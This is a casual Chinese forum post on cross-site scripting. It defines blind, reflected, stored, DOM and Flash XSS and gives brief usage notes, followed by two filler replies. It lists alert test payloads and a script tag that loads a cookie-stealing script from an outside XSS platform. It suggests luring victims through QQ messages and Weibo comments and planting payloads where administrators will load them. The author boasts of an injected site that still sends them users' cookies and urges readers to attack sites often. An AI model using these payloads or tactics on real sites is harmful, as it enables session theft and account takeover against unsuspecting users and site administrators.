小菜XSS小计

admin

由于本人是手机党，所以此文非常之不高深，纯属小菜的一个随记，认真你就输了，本文不探讨如何寻找xss漏洞*^_^*
一，定义
1.盲打:个人理解，就是纯属测试，有反应就继续深入。
2.反射型XSS:个人理解，需要用户点击才能触发的XSS，类似于钓鱼。非持久型。
3.持久型XSS:个人理解，利用各种方式插进数据库，导致成为一个持久性的。
4.DOMXSS，个人理解，类似于反射型，只是寻找此类XSS比反射性的难，有显性，隐性等。
5.Flashxss:利用缺陷的flash，swf继续X
二:利用方法及用处
1.盲打:喜欢用一些基础语句，比如在搜索框，keyboard=后面插上<script>alert("xss")</script>，<img src="javascript:alert('XSS')">等一些基础语句，看他弹不弹框框。仅做刚开始的test之用。
2.反射型:也是利用一些基础代码，然后在盲打的基础上继续深入，比如盗取cookies，原先都是利用js代码。现在呢，俺们有xss平台，so seay~，如，<script src=http://x.co/1Ou19></script>，这就是某平台xss代码，可盗取cookies。反射型的需要用户点击，so，可以通过QQ发给对方[淫荡了。。。]可以在名气高的微博里评论。对于目标站。可以在个人资料、留言板里插入，然后坐等管理员上线，进入后台~反射型的可以盗取Cookies，页面劫持。页面截图，钓鱼，蠕虫等。
3.持久型:持久嘛，那必须持久~通过发帖，修改某元素，通过colour=，通过链接等方式，让其插入数据库[当然，也要让它执行的起来。]，说个实例吧，我也不知道我啥时往那个网站X了一下，反正只要有用户进入那网站，用户Cookies就会跑来。。可用于csrf，跨站，键盘记录等。
4.DomXSS:多存在于脚本中，有时，看源代码就可以找到漏洞所在，有时他也会变隐性，还会跟javascript各种家伙搞一起。当然。他也能盗取cookies。
5.FlashXSS:这个嘛，肯定首先要找到有缺陷的flash，因为我也不太懂。所以一笔带过。。恶意的swf在iframe下能获取到swf所在域的cookies。
三:总结
如果在xss横行的年代，你不X你就out啦~多X有益健康~有些不能拿下的站，实际上可以通过xss轻松搞定。大家可以去乌云或者看看瘦子的关于xss的书籍，非常不错~
本人由于手机党，不能搭配图和事例，如果有机会，会再续一篇。

俺是专业顶贴滴~~~

我是来刷分的，嘿嘿

┏ (^ω^)=&#9758;回帖是一种美德